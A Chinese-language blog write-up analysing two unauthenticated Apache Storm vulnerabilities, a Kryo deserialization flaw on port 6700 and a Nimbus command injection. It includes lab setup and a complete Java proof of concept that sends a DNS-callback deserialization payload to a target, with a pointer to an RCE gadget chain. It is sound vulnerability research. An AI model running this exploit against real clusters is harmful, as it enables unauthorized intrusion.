3 min read

Apache Storm两个未授权CVE

看到GitHub的安全实验室又出了两篇漏洞分析,我就看一下。

前言

  1. GHSL-2021-086: Unsafe Deserialization in Apache Storm supervisor - CVE-2021-40865
  2. GHSL-2021-085:Apache Storm Nimbus 中的命令注入 - CVE-2021-38294

环境搭建

搭环境非常恶心,需要zookeeper和storm,并且需要在Linux上,因为CVE-2021-38294命令注入只在Linux上有。

下载链接:

  1. https://dlcdn.apache.org/zookeeper/zookeeper-3.7.0/apache-zookeeper-3.7.0-bin.tar.gz
  2. https://apache.mirror.iphh.net/storm/apache-storm-2.2.0/apache-storm-2.2.0.zip

zookeeper启动

cp zookeeper/conf/zoo_sample.cfg zookeeper/conf/zoo.cfg
./bin/zkServer.sh start

storm配置,注释掉以下几行,并修改为自己的ip

storm.zookeeper.servers:
    - "192.168.137.138"
nimbus.seeds : ["192.168.137.138"]
ui.port: 8081

然后先启动zookeeper以后启动storm

cd storm/bin
python3 storm.py nimbus
python3 storm.py supervisor
python3 storm.py ui

然后8081端口就是ui的web服务

1.png

然后需要添加计算作业Topology

创建一个maven项目,修改pom文件

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>stormJob</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.apache.storm</groupId>
            <artifactId>storm-core</artifactId>
            <version>2.2.0</version>
        </dependency>
    </dependencies>

</project>

创建sum.ClusterSumStormTopology类

package sum;
import java.util.Map;

import org.apache.storm.Config;
import org.apache.storm.StormSubmitter;
import org.apache.storm.generated.AlreadyAliveException;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.generated.InvalidTopologyException;
import org.apache.storm.spout.SpoutOutputCollector;
import org.apache.storm.task.OutputCollector;
import org.apache.storm.task.TopologyContext;
import org.apache.storm.topology.OutputFieldsDeclarer;
import org.apache.storm.topology.TopologyBuilder;
import org.apache.storm.topology.base.BaseRichBolt;
import org.apache.storm.topology.base.BaseRichSpout;
import org.apache.storm.tuple.Fields;
import org.apache.storm.tuple.Tuple;
import org.apache.storm.tuple.Values;
import org.apache.storm.utils.Utils;

public class ClusterSumStormTopology {

    /**
     * Spout需要继承BaseRichSpout
     * 产生数据并且发送出去
     * */
    public static class DataSourceSpout extends BaseRichSpout{

        private SpoutOutputCollector collector;
        /**
         * 初始化方法,在执行前只会被调用一次
         * @param conf 配置参数
         * @param context 上下文
         * @param collector 数据发射器
         * */
        public void open(Map conf, TopologyContext context, SpoutOutputCollector collector) {
            this.collector = collector;
        }

        int number = 0;
        /**
         * 产生数据,生产上一般是从消息队列中获取数据
         * */
        public void nextTuple() {
            this.collector.emit(new Values(++number));
            System.out.println("spout发出:"+number);
            Utils.sleep(1000);
        }

        /**
         * 声明输出字段
         * @param declarer
         * */
        public void declareOutputFields(OutputFieldsDeclarer declarer) {
            /**
             * num是上nextTuple中emit中的new Values对应的。上面发几个,这里就要定义几个字段。
             * 在bolt中获取的时候,只需要获取num这个字段就行了。
             * */
            declarer.declare(new Fields("num"));
        }

    }

    /**
     * 数据的累计求和Bolt
     * 接收数据并且处理
     * */
    public static class SumBolt extends BaseRichBolt{

        /**
         * 初始化方法,只会被执行一次
         * */
        public void prepare(Map stormConf, TopologyContext context, OutputCollector collector) {

        }

        int sum=0;
        /**
         * 获取spout发送过来的数据
         * */
        public void execute(Tuple input) {
            //这里的num就是在spout中的declareOutputFields定义的字段名
            //可以根据index获取,也可以根据上一个环节中定义的名称获取
            Integer value = input.getIntegerByField("num");
            sum+=value;
            System.out.println("Bolt:sum="+sum);
        }

        /**
         * 声明输出字段
         * @param declarer
         * */
        public void declareOutputFields(OutputFieldsDeclarer declarer) {

        }

    }

    public static void main (String[] args){


        //TopologyBuilder根据spout和bolt来构建Topology
        //storm中任何一个作业都是通过Topology方式进行提交的
        //Topology中需要指定spout和bolt的执行顺序
        TopologyBuilder tb = new TopologyBuilder();
        tb.setSpout("DataSourceSpout", new DataSourceSpout());
        //SumBolt以随机分组的方式从DataSourceSpout中接收数据
        tb.setBolt("SumBolt", new SumBolt()).shuffleGrouping("DataSourceSpout");

        //代码提交到storm集群上运行
        try {
            StormSubmitter.submitTopology("ClusterSumStormTopology", new Config(), tb.createTopology());
        } catch (AlreadyAliveException e) {
            e.printStackTrace();
        } catch (InvalidTopologyException e) {
            e.printStackTrace();
        } catch (AuthorizationException e) {
            e.printStackTrace();
        }

    }
}

然后maven打jar包传到storm机器上。

然后运行

python3 storm.py jar /home/ubuntu/stormJob-1.0-SNAPSHOT.jar sum.ClusterSumStormTopology
python3 storm.py list

list之后可以看到任务在运行才算成功。

2.png

CVE-2021-40865

原因在于6700端口对于数据的处理先进行了反序列化,然后才校验身份验证。

org.apache.storm.messaging.netty.StormServerPipelineFactory

3.png

按顺序注册

  1. MessageDecoder
  2. SaslStormServerHandler
  3. SaslStormServerAuthorizeHandler
  4. StormServerHandler

MessageDecoder重写了decode方法,对传入数据进行解码。

然后从buf中读一个Short值,当等于-600时,进入BackPressureStatus.read(bytes, this.deser)

4.png

然后进行KryoValuesDeserializer.deserializeObject(byte) 5.png

其中KryoValuesDeserializer是StormServerPipelineFactory传入的new KryoValuesDeserializer(this.topoConf))

6.png

其中SerializationFactory.getKryo(conf)从序列化工厂中取出反序列化对象

7.png

通过conf.get(“topology.kryo.factory”)取出传入conf中的反序列化工厂,poc中构造的为org.apache.storm.serialization.DefaultKryoFactory,取出工厂类之后,进一步调用DefaultKryoFactory.getKryo(conf)

8.png

20行这里返回了一个KryoSerializableDefault()实例。

这里需要注意44行当this.override为true时,会返回一个new SerializableSerializer()。它直接调用ObjectInputStream进行序列化和反序列化

9.png

那么this.override何时为true呢?

10.png

当调用了DefaultKryoFactory的postRegister()时会返回一个由ObjectInputStream进行序列化和反序列化的类。

11.png

然后org/apache/storm/serialization/SerializationFactory.class:92这个地方调用postRegister(),所以达到反序列化任意对象的效果。

poc如下

package com.test;

import org.apache.storm.serialization.KryoValuesSerializer;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.math.BigInteger;
import java.net.*;
import java.util.HashMap;

public class Main {

    public static byte[] buffer(KryoValuesSerializer ser, Object obj) throws IOException {
        byte[] payload = ser.serializeObject(obj);
        BigInteger codeInt = BigInteger.valueOf(-600);
        byte[] code = codeInt.toByteArray();
        BigInteger lengthInt = BigInteger.valueOf(payload.length);
        byte[] length = lengthInt.toByteArray();

        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
        outputStream.write(code);
        outputStream.write(new byte[]{0, 0});
        outputStream.write(length);
        outputStream.write(payload);
        return outputStream.toByteArray();
    }

    public static KryoValuesSerializer getSerializer() throws MalformedURLException {
        HashMap<String, Object> conf = new HashMap<>();
        conf.put("topology.kryo.factory", "org.apache.storm.serialization.DefaultKryoFactory");
        conf.put("topology.tuple.serializer", "org.apache.storm.serialization.types.ListDelegateSerializer");
        conf.put("topology.skip.missing.kryo.registrations", false);
        conf.put("topology.fall.back.on.java.serialization", true);
        return new KryoValuesSerializer(conf);
    }

    public static void main(String[] args) {
        try {
            // Payload construction
            URLStreamHandler handler = new SilentURLStreamHandler();
            String url = "http://aqa13.dnslog.cn";

            HashMap ht = new HashMap(); // HashMap that will contain the URL
            URL u = new URL(null, url, handler); // URL to use as the Key
            ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
            Field hashCode = u.getClass().getDeclaredField("hashCode");
            hashCode.setAccessible(true);
            hashCode.set(u, -1);

            // Kryo serialization
            byte[] bytes = buffer(getSerializer(), ht);

            // Send bytes
            Socket socket = new Socket("192.168.137.138", 6700);
            OutputStream outputStream = socket.getOutputStream();
            outputStream.write(bytes);
            outputStream.flush();
            outputStream.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    static class SilentURLStreamHandler extends URLStreamHandler {

        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }

}

RCE的话可以打cb链,参考 http://noahblog.360.cn/apache-storm-vulnerability-analysis/

CVE-2021-38294

命令注入,端口 6627 上公开了许多服务,可以未授权链接调用

12.png

user参数传入isUserPartOf()

13.png

继续传递到this.groupMapper.getGroups(user)

14.png

继续传递

15.png

拼接参数执行命令造成命令注入。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。